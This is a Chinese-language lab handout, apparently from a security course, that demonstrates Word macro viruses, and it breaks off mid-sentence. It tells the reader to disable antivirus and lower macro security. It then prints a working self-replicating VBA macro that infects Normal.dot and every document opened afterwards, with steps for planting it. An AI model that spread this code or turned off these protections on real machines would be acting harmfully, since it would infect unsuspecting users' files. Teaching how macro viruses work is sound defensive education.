Word 宏病毒 1 . 实验目的(后果自负) Word 宏是指能组织到一起为独立命令使用的一系列Word 指令,它能使日常工作变得容易。本实验演示了宏的编写,通过两个简单的宏病毒示例,说明宏的原理及其安全漏洞和缺陷,理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识。 2 . 实验所需条件和环境 硬件设备:局域网,终端 PC 机。 系统软件:Window s 系列操作系统 支撑软件:Word 2003 软件设置:关闭杀毒软;打开 Word 2003,在工具宏安全性中,将安全级别设置为低,在可靠发行商选项卡中,选择信任任何所有安装的加载项和模板,选择信任 visual basic 项目的访问 实验环境配置如下图所示: 受感染终端受感染Word文档被感染终端 宏病毒传播示意图 3 . 实验内容和分析 为了保证该实验不至于造成较大的破坏性,进行实验感染后,被感染终端不要打开过多的word 文档,否则清除比较麻烦(对每个打开过的文档都要清除)。 3.1. 例 1 自我复制,感染 w ord 公用模板和当前文档 代码如下: 'Micro-Virus Sub Document_Open() On Error Resume Next Application.DisplayStatusBar = False Options.SaveNormalPrompt = False Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule End If With Host If .Lines(1.1) <> "'Micro-Virus" Then .DeleteLines 1, .CountOfLines .InsertLines 1, Ourcode .ReplaceLine 2, "Sub Document_Close()" If ThisDocument = nomaltemplate Then .ReplaceLine 2, "Sub Document_Open()" ActiveDocument.SaveAs ActiveDocument.FullName End If End If End With MsgBox "MicroVirus by Content Security Lab" End Sub 打开一个word 文档,然后按 Alt+F11 调用宏编写窗口(工具宏Visual Basic宏编辑器),在左侧的project—>Microsoft Word 对象ThisDocument 中输入以上代码,保存,此时当前 word 文档就含有宏病毒,只要下次打开这个word 文档,就会执行以上代码,并将自身复制到 Normal.dot(word 文档的公共模板)和当前文档的ThisDocument 中,同时改变函数名(模板中...
